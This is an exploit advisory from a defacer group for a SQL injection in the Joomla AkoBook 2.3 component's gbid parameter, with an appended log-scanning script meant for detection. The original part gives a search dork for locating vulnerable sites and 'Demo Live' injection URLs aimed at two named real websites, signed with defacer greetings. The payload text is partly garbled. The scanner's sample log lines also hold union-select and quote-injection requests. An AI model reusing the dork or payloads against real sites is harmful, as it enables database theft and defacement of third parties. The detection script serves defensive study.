Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability

2009-07-29 / 2009-07-30
Credit: Ab1i
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
###################################################
[+] Author : Ab1i
[+] Email : ab1i_usta@hotmail.com
[+] Dork : inurl:index.php?option=com_akobook
###################################################
________________________________________________________

Example: http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1): http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birli%20+%20+1,2,3,4,5,6,7,8,9%20se&#195;in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*

Demo Live (2): http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birli%20+%20+1,2,3,4,5,6,7,8,9%20se&#195;in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*

++++++++++++++++++++++++++++++++++++++++++++++++++
www.ayyildiz.org
A Turk has no friend but a Turk. You too, support Turkish sites ....
Turkish Defacers Ab1i Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi .
Greetings to the masters :)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License. </copyright>
<authorEmail>contact@saddo.ru</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>
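
Detection example (added here, not part of the original advisory or of the AkoBook code): a log check that flags com_akobook requests whose gbid or Itemid value is not a plain unsigned integer, which is the shape of the requests shown above. The log format, the sample lines and the assumption that both parameters are numeric ids are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: gbid (guestbook entry id) and Itemid (Joomla menu item id)
# should only ever carry plain unsigned integers.
NUMERIC_PARAMS = ("gbid", "Itemid")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(url):
    """Return names of numeric parameters carrying non-integer values in a
    com_akobook request; an empty list means the request looks well-formed."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    options = [v.lower() for v in query.get("option", [])]
    if "com_akobook" not in options:
        return []
    # parse_qs URL-decodes values, so encoded spaces and quotes are seen as-is.
    return [name for name in NUMERIC_PARAMS
            if any(not re.fullmatch(r"[0-9]{1,10}", v)
                   for v in query.get(name, []))]


def scan(log_lines):
    """Yield (line_number, flagged_parameters) for each suspicious request."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            flagged = suspicious_params(match.group(1))
            if flagged:
                yield number, flagged


# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jul/2009:10:00:01 +0000] "GET /index.php?option=com_akobook&Itemid=36 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [29/Jul/2009:10:00:05 +0000] "GET /index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=12 HTTP/1.1" 200 4811',
    '192.0.2.66 - - [29/Jul/2009:10:02:13 +0000] "GET /index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20union%20select%201,2,3 HTTP/1.1" 200 4790',
    '192.0.2.66 - - [29/Jul/2009:10:02:20 +0000] "GET /index.php?option=com_content&id=7%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, flagged in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer value in {', '.join(flagged)}")
```

The same strict integer test, applied server-side to gbid before it reaches any query, is the corresponding input-validation fix for CWE-89 here.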

References:

http://www.securityfocus.com/bid/35268
http://www.milw0rm.com/exploits/8911

